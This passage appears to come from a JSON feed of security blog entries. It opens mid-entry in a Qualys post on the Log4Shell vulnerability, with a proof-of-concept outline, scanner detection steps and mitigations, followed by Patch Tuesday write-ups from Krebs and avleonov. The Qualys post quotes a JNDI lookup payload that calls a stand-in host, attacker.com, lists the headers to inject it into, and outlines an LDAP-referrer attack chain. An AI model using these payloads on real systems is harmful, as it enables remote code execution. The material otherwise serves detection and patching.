retrieve DataSource objects and enhance the data which is being logged by the log4j library.\n\n#### JNDI Injection\n\nOn vulnerable instances of Log4j2, any data that is being logged can trigger the application to reach out to attacker-controlled servers.\n\nAs the attack vectors are not limited to specific injection points, attackers can test the vulnerability by injecting malicious JNDI lookup payloads inside HTTP request headers or via POST request form fields such as username, email, password, etc. 
to test this vulnerability using:\n\n\n\nVulnerable instances will parse the above payload and reach out to the malicious LDAP server attacker.com via the JNDI lookup method to execute the `rce_class`.\n\nThe vulnerability is present in the environment because of improper input validation. On any new log entry, if log4j encounters a JNDI lookup string starting with `${jndi:protocol://`, it will try to parse it, then perform the lookup action to resolve the required variable, and eventually fetch and execute the malicious `rce_class`.\n\n### Remote Code Execution POC:\n\nQualys WAS team was able to exploit the vulnerability successfully on a vulnerable instance of Log4j. Below is the POC to demonstrate how attackers are exploiting this vulnerability in the real world:\n\n##### **Vulnerable application code :**\n\n\n\nFirst, the attacker injects the JNDI payload into the vulnerable application. Once the input is logged by log4j, it will parse the text and try to resolve it.\n\n##### Stage one : LDAP referrer\n\nThe above payload supplied by the attacker uses the LDAP protocol. 
The log4j library, on encountering this string, will make an LDAP query to the target LDAP server running on `127.0.0.1:1389`.\n\nNext, the attacker uses the [marshalsec](<https://github.com/mbechler/marshalsec>) package to set up an LDAP referrer that accepts the incoming JNDI lookup request and creates a redirection to an HTTP server hosting the malicious class (Exploit.class) as shown below:\n\n\n\n##### Stage two: Hosting malicious class\n\nHere, an HTTP server is hosting a malicious Java class which will execute a command to open a calculator application on the target server.\n\n\n\nFinally, the malicious class is downloaded and executed, leading to remote code execution.\n\n\n\n### Detecting the Vulnerability with Qualys WAS\n\nCustomers can detect Apache Log4j Remote Code Execution vulnerability (CVE-2021-44228) with Qualys Web Application Scanning using **QID 150440**, **150441**:\n\nQID 150440 - Apache Log4j Remote Code Execution (RCE) Vulnerability (Log4Shell CVE-2021-44228)\n\nThe WAS module injects a JNDI payload into the headers listed below and into application-specific vulnerable endpoints, and uses an Out Of Band (OOB) detection mechanism in which vulnerable instances make a callback DNS query that triggers the Qualys Periscope detection mechanism:\n\n 1. X-Api-Version\n 2. User-Agent\n 3. Referer\n 4. X-Druid-Comment\n 5. Origin\n 6. Location\n 7. X-Forwarded-For\n 8. Cookie\n 9. X-Requested-With\n 10. X-Forwarded-Host\n 11. Accept\n 12. Authentication\n 13. Authorization\n\nVulnerable Applications detection covered under QID 150440:\n\n 1. Apache Struts2\n 2. Apache Solr\n 3. Apache Druid\n 4. Apache OFBiz\n 5. Apache JSPWiki\n\nQualys WAS OOB service uses a unique DNS payload on every request, which makes the detection mechanism accurate in identifying the vulnerability.\n\n### WAS Log4Shell Detection Methodology with Qualys Periscope\n\n\n\nWhen WAS tests a web application for the Log4Shell vulnerability, the following steps are performed:\n\n 1. 
WAS makes multiple requests with specially crafted payloads in the request header fields listed above. For example, the 'User-Agent' here has been modified to include a specific payload to Qualys Periscope:\n\n\n\n 2. If the scanned application is vulnerable to Log4Shell, it will attempt to connect to the address in the modified request header. However, it must first resolve the FQDN for the domain qualysperiscope.com shown in the payload.\n 3. As part of the DNS resolution process:\n 1. The request is received by the Qualys Periscope DNS service.\n 2. The DNS service processes the request to verify the hash embedded in the request is valid. This ensures the lookup request is genuine and was generated by a WAS scan.\n 3. If the hash is verified, Periscope logs the request internally.\n 4. If verification fails, the request is dropped.\n 4. WAS then queries Periscope with the lookup request data along with the scan ID and hash for each of the injected request header payloads.\n 1. Periscope verifies the hash from WAS and either:\n 1. Matches the WAS query against a logged lookup request from the web application - the site is vulnerable to Log4Shell.\n 2. Fails to match the WAS query against a logged lookup request from the web application - the site is not vulnerable.\n 5. WAS processes the data received from Qualys Periscope, and reports any vulnerabilities corresponding to payloads which were successfully executed.\n\n### Scan Configurations :\n\nQID 150440 has been added to the WAS Core Detection Scope, so all scans using the Core detection will include this QID in scanning. However, to expedite testing for CVE-2021-44228 across all of your web applications, it is recommended that you create a new scanning Option Profile to limit testing to only this specific vulnerability. 
This can be done by creating a new Option Profile and selecting \u201cCustom Search Lists\u201d under the Detection Scope to create a new static list.\n\n\n\nComplete the creation wizard and add QID 150440 to the Static Search List.\n\n\n\nOptionally you can add Information Gathered (IG) QIDs for confirmation of links crawled, scan diagnostics, etc. IG QIDs will not significantly impact the efficiency of the scan.\n \n \n IG QIDs: 6 ,38116 ,38291 ,38597 ,38600 ,38609 ,38704 ,38706 ,38717 ,38718 ,42350 ,45017 ,45038 ,45218 ,86002 ,90195 ,150005 ,150006 ,150007 ,150008 ,150009 ,150010 ,150014 ,150015 ,150016 ,150017 ,150018 ,150019 ,150020 ,150021 ,150024 ,150025 ,150026 ,150028 ,150029 ,150030 ,150032 ,150033 ,150034 ,150035 ,150036 ,150037 ,150038 ,150039 ,150040 ,150041 ,150042 ,150043 ,150044 ,150045 ,150054 ,150058 ,150061 ,150065 ,150066 ,150067 ,150077 ,150078 ,150080 ,150082 ,150083 ,150086 ,150087 ,150089 ,150094 ,150095 ,150097 ,150099 ,150100 ,150101 ,150104 ,150105 ,150106 ,150111 ,150115 ,150116 ,150125 ,150126 ,150135 ,150140 ,150141 ,150142 ,150143 ,150148 ,150152 ,150157 ,150164 ,150167 ,150168 ,150169 ,150170 ,150172 ,150176 ,150177 ,150182 ,150183 ,150184 ,150185 ,150186 ,150194 ,150195 ,150197 ,150202 ,150203 ,150204 ,150205 ,150206 ,150208 ,150210 ,150244 ,150245 ,150247 ,150257 ,150261 ,150262 ,150265 ,150277 ,150291 ,150292 ,150308 ,150325 ,150344 ,150345 ,150348 ,150350 ,150351 ,150352\n\nWe recommend limiting the scan to between 50 and 100 links in scope maximum.\n\n\n\nAdditionally, configure the scan to be launched at "Maximum" Performance for faster scan completion.\n\n\n\nScanning with the above mentioned scan configurations will achieve two things to expedite testing your web applications in the most efficient way possible. First, we are only testing for one specific vulnerability, QID 150440. 
Second, as this vulnerability is only tested at the base URI and several directories up and down as appropriate, there is no need to crawl and test every link in the application. These two changes will allow each web application to be scanned faster than full Core detection scans while still providing you the necessary visibility of any vulnerable versions of Log4j2.\n\n#### Report : 150440\n\nOnce the vulnerability is successfully detected, users shall see similar kind of results for QID 150440 in the vulnerability scan report:\n\n\n\nAs you can see in the above report, the payload is injected inside **User-Agent** request header and makes a DNS lookup request to the Qualys Periscope detection mechanism.\n\nQualys WAS has released QID 150441 - Forms Vulnerable to Apache Log4j Remote Code Execution (RCE) Vulnerability (Log4Shell CVE-2021-44228), which injects JNDI payloads into every user input form field ex. (username, email, password) which makes it more reliable and efficient detection in comparison to open source scanning scripts written in Python and Golang which have limited scanning capability.\n\nAfter injecting JNDI payloads into every form field, the vulnerable application makes a DNS lookup request to Qualys Periscope mechanism:\n\nQID 150441 - Forms Vulnerable to Apache Log4j Remote Code Execution (RCE) Vulnerability (Log4Shell CVE-2021-44228)\n\n#### Report : 150441\n\nOn successful detection, users shall see similar results in vulnerability scan report:\n\n\n\nIn the above report we can see, specially crafted payload was sent via HTTP POST request to uname parameter of the application login form, which then makes a DNS lookup request to the Qualys Periscope detection mechanism.\n\n### About CVE-2021-45046\n\nApache Log4j 2.15.0 was released to address CVE-2021-44228 but it turned out that the fix was incomplete in certain non-default configuration setup. 
In CVE-2021-45046, security measures were added to version 2.15.0 to prevent remote code execution by restricting JNDI LDAP lookups to localhost by default, i.e., a remote connection to `attacker.com` will be blocked in `${jndi:ldap://attacker.com` payload.\n\nAccording to [Apache Security advisory](<https://logging.apache.org/log4j/2.x/security.html>) when the logging configuration uses non-default pattern layout with a [Context Lookup](<https://logging.apache.org/log4j/2.x/manual/lookups.html#ContextMapLookup>) value ex. `$${ctx:loginId-value}`, attackers with control over [Thread Context Map](<https://logging.apache.org/log4j/2.x/manual/thread-context.html>) (Mapped Diagnostic Context or MDC) input data can craft malicious input data using a JNDI Lookup pattern which would allow data exfiltration and remote code execution in certain scenarios.\n\n### About CVE-2021-44832\n\nThe arbitrary code execution vulnerability discovered in version 2.17.0 affects Log4j2 instances when an attacker with permission to modify the logging configuration can construct a malicious configuration using a JDBC Appender with a data source referencing a JNDI URI which can execute remote code. This issue is fixed by limiting JNDI data source names to the java protocol in Log4j2 versions 2.17.1, 2.12.4, and 2.3.2.\n\nThe Qualys WAS research team is constantly working to find more attack vectors and will update the signatures accordingly. We are also working on detecting the vulnerability affecting applications using Log4j logging utility and will update new QIDs as needed.\n\n### Solution\n\nIt is strongly recommended to upgrade to the latest **Apache Log4j 2.17.1** to remediate these vulnerabilities (CVE-2021-44228, CVE-2021-45046, CVE-2021-44832). 
According to [Apache Security Advisory](<https://logging.apache.org/log4j/2.x/security.html>) version 2.17.1 also remediates DoS vulnerability (CVE-2021-45105) which was present in version 2.16.0.\n\nRelease details Apache Log4j 2.17.1 : https://logging.apache.org/log4j/2.x/changes-report.html#a2.17.1\n\nIn cases where upgrading the version is not possible, we recommend applying the following mitigation guidelines:\n\n * **For Log4j 1.x** : Applications using Log4j 1.x are only vulnerable to CVE-2021-44228 when they use JNDI in their configuration. CVE-2021-4104 has been filed to track this vulnerability and can be mitigated by auditing logging configuration to ensure it has no JMSAppender configured.\n * **For Log4j 2.x** : Implement one of the mitigation techniques below :\n * Upgrade to Log4j 2.3.2 (for Java 6), 2.12.4 (for Java 7), or 2.17.1 (for Java 8 and later).\n * In prior releases confirm that if the JDBC Appender is being used, it is not configured to use any protocol other than Java.\n * Remove the JndiLookup class from the classpath: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class.\n\nFor latest updates on solution and mitigation guidelines, please refer to [Apache Log4j security advisory](<https://logging.apache.org/log4j/2.x/security.html>)\n\n### Credits\n\n**Apache Security Advisory**: <https://logging.apache.org/log4j/2.x/security.html>\n\n**CVE Details**:\n\n * <https://nvd.nist.gov/vuln/detail/CVE-2021-44228>\n * <https://nvd.nist.gov/vuln/detail/CVE-2021-45046>\n * <https://nvd.nist.gov/vuln/detail/CVE-2021-44832>\n\n**Credits for the vulnerability discovery go to:**\n\n * Chen Zhaojun of Alibaba Cloud Security Team.\n * Kai Mindermann of iC Consult and separately by 4ra1n\n\n### References:\n\n * <https://github.com/tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce>\n * <https://y4y.space/2021/12/10/log4j-analysis-more-jndi-injection/>\n * <https://www.lunasec.io/docs/blog/log4j-zero-day/>\n * 
<https://www.huntress.com/blog/rapid-response-critical-rce-vulnerability-is-affecting-java>\n\n### Contributors\n\n * **Sheela Sarva**, Director, Quality Engineering, Web Application Security, Qualys\n * **John Delaroderie**, Director, Product Management, Web App Security, Qualys\n\nPlease contact [John Delaroderie](<mailto:jdelaroderie@qualys.com>) if you need further information.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-15T17:06:36", "type": "qualysblog", "title": "Is Your Web Application Exploitable By Log4Shell Vulnerability?", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4104", "CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2021-12-15T17:06:36", "id": "QUALYSBLOG:42335884011D582222F08AEF81D70B94", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-27T20:37:20", "description": "If you run Java applications in containers, then it is critical that you check for Log4Shell vulnerabilities, given the high severity of this 
potential exploit. Qualys Container Security offers multiple methods to help you detect Log4Shell in your container environment. The Container Security sensor checks both running containers and container images for the following vulnerabilities: \n\n * QID 376157/[CVE-2021-44228](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>) \u2013 Detect vulnerable log4j jar for versions at or below 2.14 \n * QID 376178/[CVE-2021-45046](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>) - Detect vulnerable log4j jar for versions at or below 2.15 \n * QID 376194/[CVE-2021-45105](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45105>) - Detect vulnerable log4j jar for versions at or below 2.16 \n\nQualys highly recommends running a vulnerability scan against all your running containers because Java applications running in the container are susceptible to Log4Shell vulnerability exploits. To detect vulnerabilities in running containers, you must deploy the Container Security sensor in "General" mode on the hosts running the containers. The sensor will scan each running container on the host looking for a running Java process, and then check whether that process has the log4j jar file loaded. If the log4j jar is loaded, it will check the version of log4j and, if it is vulnerable, it will report it. \n\nTo see all the containers impacted by these vulnerabilities, navigate to the "Container Security" application, then select the "Assets-> Container" tab, and use the following QQL query: \n \n \n vulnerabilities.qid:376157 or vulnerabilities.qid:376178 or vulnerabilities.qid:376194 \n\n\n\nTo view details of the vulnerability, you can click on the vulnerable container and navigate to the "Vulnerabilities" tab as shown in the screenshot below: \n\n\n\nIn addition to scanning running containers, Qualys recommends that you scan container images for Log4Shell vulnerabilities. 
\n\nCatching and remediating Log4Shell vulnerabilities in container images will eliminate exposure to the vulnerabilities when the image is instantiated as a container. To detect Log4Shell vulnerabilities in container images, you will need to run the Container Security sensor version 1.10.1 or greater in any of the supported modes. The Container Security sensor will look for all the jar files in the image, searching for the log4j jar. If the log4j jar is not in the list of the jar files, it will then look inside each of the jar files. If it detects a vulnerable version, then it will report any/all instances. \n\nTo view all the impacted images, navigate to the Qualys Container Security app, then select the "Assets-> Images" tab, and use the following QQL query: \n \n \n vulnerabilities.qid:376157 or vulnerabilities.qid:376178 or vulnerabilities.qid:376194 \n\n\n\nTo view details of the vulnerability, you can click on the image and navigate to the "Vulnerabilities" tab as shown in the screenshot below: \n\n\n\nQualys Container Security offers a comprehensive solution for detecting vulnerabilities, including Log4Shell, across the entire lifecycle of the container from build time to runtime. 
Check back periodically to our Log4Shell Resources page for the latest threat intelligence for container security.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-27T19:39:34", "type": "qualysblog", "title": "How to Discover Log4Shell Vulnerabilities in Running Containers & Images", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2021-12-27T19:39:34", "id": "QUALYSBLOG:6C71B912ABF74BE51F014EC90669CF30", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "krebs": [{"lastseen": "2022-07-16T21:59:04", "description": "**Microsoft** today released updates to fix at least 86 security vulnerabilities in its **Windows** operating systems and other software, including a weakness in all supported versions of Windows that Microsoft warns is actively being exploited. 
The software giant also has made a controversial decision to put the brakes on a plan to block **macros** in **Office** documents downloaded from the Internet.\n\n\n\nIn February, security experts hailed Microsoft's decision to block VBA macros in all documents downloaded from the Internet. The company said it would roll out the changes in stages between April and June 2022.\n\nMacros have long been a trusted way for cybercrooks to trick people into running malicious code. Microsoft Office by default warns users that enabling macros in untrusted documents is a security risk, but those warnings can be easily disabled with the click of button. Under Microsoft's plan, the new warnings provided no such way to enable the macros.\n\nAs _Ars Technica_ veteran reporter **Dan Goodin** [put it](<https://arstechnica.com/information-technology/2022/07/microsoft-makes-major-course-reversal-allows-office-to-run-untrusted-macros/>), "security professionals\u2014some who have spent the past two decades watching clients and employees get infected with ransomware, wipers, and espionage with frustrating regularity\u2014cheered the change."\n\nBut last week, Microsoft abruptly changed course. 
As [first reported](<https://www.bleepingcomputer.com/news/microsoft/microsoft-rolls-back-decision-to-block-office-macros-by-default/>) by _BleepingComputer_, Redmond said it would roll back the changes based on feedback from users.\n\n"While Microsoft has not shared the negative feedback that led to the rollback of this change, users have reported that they are unable to find the Unblock button to remove the Mark-of-the-Web from downloaded files, making it impossible to enable macros," Bleeping's **Sergiu Gatlan** wrote.\n\nMicrosoft later said the decision to roll back turning off macros by default was temporary, although it has not indicated when this important change might be made for good.\n\nThe zero-day Windows vulnerability already seeing active attacks is [CVE-2022-22047](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22047>), which is an elevation of privilege vulnerability in all supported versions of Windows. Trend Micro's **Zero Day Initiative** notes that while this bug is listed as being under active attack, there\u2019s no information from Microsoft on where or how widely it is being exploited.\n\n"The vulnerability allows an attacker to execute code as SYSTEM, provided they can execute other code on the target," ZDI's Dustin Childs [wrote](<https://www.zerodayinitiative.com/blog/2022/7/12/the-july-2022-security-update-review>). "Bugs of this type are typically paired with a code execution bug, usually a specially crafted Office or Adobe document, to take over a system. 
These attacks often rely on macros, which is why so many were disheartened to hear Microsoft\u2019s delay in blocking all Office macros by default."\n\n**Kevin Breen**, director of cyber threat research at **Immersive Labs**, said CVE-2022-22047 is the kind of vulnerability that is typically seen abused after a target has already been compromised.\n\n"Crucially, it allows the attacker to escalate their permissions from that of a normal user to the same permissions as the SYSTEM," he said. "With this level of access, the attackers are able to disable local services such as Endpoint Detection and Security tools. With SYSTEM access they can also deploy tools like Mimikatz which can be used to recover even more admin and domain level accounts, spreading the threat quickly."\n\nAfter a brief reprieve from patching serious security problems in the **Windows Print Spooler** service, we are back to business as usual. July's patch batch contains fixes for four separate elevation of privilege vulnerabilities in Windows Print Spooler, identified as [CVE-2022-22022](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22022>), [CVE-2022-22041](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22041>), [CVE-2022-30206](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30206>), and [CVE-2022-30226](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30226>). Experts at security firm **Tenable** note that these four flaws provide attackers with the ability to delete files or gain SYSTEM level privileges on a vulnerable system.\n\nRoughly a third of the patches issued today involve weaknesses in Microsoft's Azure Site Recovery offering. 
Other components seeing updates this month include **Microsoft Defender for Endpoint**; **Microsoft Edge** (Chromium-based); **Office**; **Windows BitLocker**; **Windows Hyper-V**; **Skype for Business** and **Microsoft Lync**; and **Xbox**.\n\nFour of the flaws fixed this month address vulnerabilities Microsoft rates "critical," meaning they could be used by malware or malcontents to assume remote control over unpatched Windows systems, usually without any help from users. [CVE-2022-22029](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22029>) and [CVE-2022-22039](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22039>) affect Network File System (NFS) servers, and [CVE-2022-22038](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22038>) affects the Remote Procedure Call (RPC) runtime.\n\n"Although all three of these will be relatively tricky for attackers to exploit due to the amount of sustained data that needs to be transmitted, administrators should patch sooner rather than later," said **Greg Wiseman**, product manager at **Rapid7**. "[CVE-2022-30221](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30221>) supposedly affects the Windows Graphics Component, though Microsoft\u2019s FAQ indicates that exploitation requires users to access a malicious RDP server."\n\nSeparately, Adobe today [issued patches](<https://helpx.adobe.com/security.html>) to address at least 27 vulnerabilities across multiple products, including **Acrobat** and **Reader**, **Photoshop**, **RoboHelp**, and **Adobe Character Animator**.\n\nFor a closer look at the patches released by Microsoft today and indexed by severity and other metrics, check out the [always-useful Patch Tuesday roundup](<https://isc.sans.edu/forums/diary/Microsoft%20July%202022%20Patch%20Tuesday/28838/>) from the **SANS Internet Storm Center**. 
And it\u2019s not a bad idea to hold off updating for a few days until Microsoft works out any kinks in the updates: [AskWoody.com](<https://www.askwoody.com/>) usually has the lowdown on any patches that may be causing problems for Windows users.\n\nAs always, please consider backing up your system or at least your important documents and data before applying system updates. And if you run into any problems with these updates, please drop a note about it here in the comments.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-07-13T01:02:49", "type": "krebs", "title": "Microsoft Patch Tuesday, July 2022 Edition", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22022", "CVE-2022-22029", "CVE-2022-22038", "CVE-2022-22039", "CVE-2022-22041", "CVE-2022-22047", "CVE-2022-30206", "CVE-2022-30221", "CVE-2022-30226"], "modified": "2022-07-13T01:02:49", "id": "KREBS:4D5B2D5FA1A6E077B46D7F3051319E72", "href": "https://krebsonsecurity.com/2022/07/microsoft-patch-tuesday-july-2022-edition/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "avleonov": [{"lastseen": 
"2022-08-14T11:59:47", "description": "Hello everyone! Microsoft has been acting weird lately. I mean the recent [publication of a propaganda report](<https://t.me/avleonovcom/1021>) about evil Russians and how Microsoft is involved in the conflict between countries. It wouldn't be unusual for a US government agency, NSA or CIA to publish such a report. But when a global IT vendor, which, in theory, should be more or less neutral, does this\u2026 This is a clear signal. It's not about business anymore. \n\nAlternative video link (for Russia): <https://vk.com/video-149273431_456239096>\n\nI'll take a closer look at this report in the next episode of the Vulnerability Management news, but for now let's take a look at Microsoft July Patch Tuesday. Yes, the vendor is behaving strangely, but Microsoft products need to be patched. Right? At least for now. And tracking vulnerabilities is always a good thing. \n\nOn July Patch Tuesday, July 12, 84 vulnerabilities were released. Between June and July Patch Tuesdays, 15 vulnerabilities were released. This gives us 99 vulnerabilities in the report. \n \n \n $ cat comments_links.txt \n Qualys|July 2022 Patch Tuesday. 
Microsoft Releases 84 Vulnerabilities with 4 Critical, plus 2 Microsoft Edge (Chromium-Based); Adobe Releases 4 Advisories, 27 Vulnerabilities with 18 Critical.|https://blog.qualys.com/vulnerabilities-threat-research/2022/07/12/july-2022-patch-tuesday\n ZDI|The July 2022 Security Update Review|https://www.zerodayinitiative.com/blog/2022/7/12/the-july-2022-security-update-review\n \n $ python3.8 vulristics.py --report-type \"ms_patch_tuesday_extended\" --mspt-year 2022 --mspt-month \"July\" --mspt-comments-links-path \"comments_links.txt\" --rewrite-flag \"True\"\n ...\n Creating Patch Tuesday profile...\n MS PT Year: 2022\n MS PT Month: July\n MS PT Date: 2022-07-12\n MS PT CVEs found: 84\n Ext MS PT Date from: 2022-06-15\n Ext MS PT Date to: 2022-07-11\n Ext MS PT CVEs found: 15\n ALL MS PT CVEs: 99\n ...\n\n * Urgent: 0\n * Critical: 1\n * High: 19\n * Medium: 78\n * Low: 1\n\nInterestingly, in this Patch Tuesday, more than half of all vulnerabilities are EoP.\n\n## CSRSS EoP\n\nWhat can I say, prioritization in [Vulristics](<https://github.com/leonov-av/vulristics>) works correctly. At the top of the July Patch Tuesday list is one critical and actively exploited **Elevation of Privilege** in Windows CSRSS (CVE-2022-22047). This vulnerability has been widely reported in the media.\n\nClient Server Runtime Subsystem, or csrss.exe, is a component of the Windows NT family of operating systems that provides the user mode side of the Win32 subsystem and is included in Windows NT 3.1 and later. Because most of the Win32 subsystem operations have been moved to kernel mode drivers in Windows NT 4 and later, CSRSS is mainly responsible for Win32 console handling and GUI shutdown.\n\nCSRSS runs as a user-mode system service. 
When a user-mode process calls a function involving console windows, process/thread creation, or side-by-side support, instead of issuing a system call, the Win32 libraries (kernel32.dll, user32.dll, gdi32.dll) send an inter-process call to the CSRSS process which does most of the actual work without compromising the kernel.\n\nThis Elevation of Privilege vulnerability in CSRSS allows an attacker to execute code as SYSTEM, provided they can execute other code on the target. Bugs of this type are typically paired with a code execution bug, usually a specially crafted Office or Adobe document, to take over a system. These attacks often rely on macros, which is why so many were disheartened to hear Microsoft\u2019s delay in blocking all Office macros by default.\n\nMicrosoft says this vulnerability has been exploited in the wild, though no further details have been shared. There is no public exploit yet. Two similar vulnerabilities in CSRSS (CVE-2022-22049 and CVE-2022-22026) were also fixed, likely as a result of Microsoft\u2019s investigation into the in-the-wild exploitation of CVE-2022-22047.\n\n## RPC RCE\n\n**Remote Code Execution** in Remote Procedure Call Runtime (CVE-2022-22038). Here Microsoft has a POC exploit. This July Patch Tuesday bug could allow a remote, unauthenticated attacker to exploit code on an affected system. While not specified in the bulletin, the presumption is that the code execution would occur at elevated privileges. Combine these attributes and you end up with a potentially wormable bug. Microsoft states the attack complexity is high. 
Additional actions by an attacker are required in order to prepare a target for successful exploitation and an attacker would need to make \u201crepeated exploitation attempts\u201d to take advantage of this bug, but unless you are actively blocking RPC activity, you may not see these attempts.\n\n## Microsoft Edge Memory Corruption\n\nBetween June and July Patch Tuesday, **Memory Corruption** in Microsoft Edge (CVE-2022-2294) was released. Heap buffer overflow in WebRTC, to be precise. WebRTC (Web Real-Time Communication) is a free and open-source project providing web browsers and mobile applications with real-time communication (RTC) via application programming interfaces (APIs). It allows audio and video communication to work inside web pages by allowing direct peer-to-peer communication, eliminating the need to install plugins or download native apps. So, the vulnerability is in the Chromium Open Source Software (OSS) which is consumed by Microsoft Edge. Google is aware that an exploit for this vulnerability exists in the wild. If you\u2019re using Microsoft Edge (Chromium-based), make sure it gets updated as soon as possible.\n\n## Azure Site Recovery RCEs and EOPs\n\nThere are also a lot of vulnerabilities in Azure Site Recovery in July Patch Tuesday. Both EoPs and RCEs, and quite a few with non-public exploits of the POC maturity level. According to the description "Site Recovery is a native disaster recovery as a service (DRaaS)", it would seem that this should be patched by Microsoft themselves. But in fact, there is a Microsoft Azure Site Recovery suite installed on the hosts, and at least some of the vulnerabilities were found in it. \n\nLet's see, for example, **Elevation of Privilege** in Azure Site Recovery (CVE-2022-33675). The vulnerability was discovered and [reported to Microsoft by Tenable researcher Jimi Sebree](<https://www.tenable.com/security/research/tra-2022-26>). 
The Microsoft Azure Site Recovery suite contains a DLL hijacking flaw that allows for privilege escalation from any low privileged user to SYSTEM. \n\nIncorrect permissions on the service\u2019s executable directory (E:\\Program Files (x86)\\Microsoft Azure Site Recovery\\home\\svsystems\\transport\\\\) allow new files to be created by any user. The service launched from this directory runs automatically and with SYSTEM privileges and attempts to load several DLLs from this directory. This allows for a DLL hijacking/planting attack via several libraries that are attempted to be loaded from this location when the service is launched. Existing deployments should ensure that the Microsoft-supplied patches have been appropriately applied.\n\nThe full Vulristics report is available here: [ms_patch_tuesday_july2022_report](<https://avleonov.com/vulristics_reports/ms_patch_tuesday_july2022_report_with_comments_ext_img.html>)", "cvss3": {"exploitabilityScore": 2.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-07-23T08:34:29", "type": "avleonov", "title": "Microsoft Patch Tuesday July 2022: propaganda report, CSRSS EoP, RPC RCE, Edge, Azure Site Recovery", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, 
